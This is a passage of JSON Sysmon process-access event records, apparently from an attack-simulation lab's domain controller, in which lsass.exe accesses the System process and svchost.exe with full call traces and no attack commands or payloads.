C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.802","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1056-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1146,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.802\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1056-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.802","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1056-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1147,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.802\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.802","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1148,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.802\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.802","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1149,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.802\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.802","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1150,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.802\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.802","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1151,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.802\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.802","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1152,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.802\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.802","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
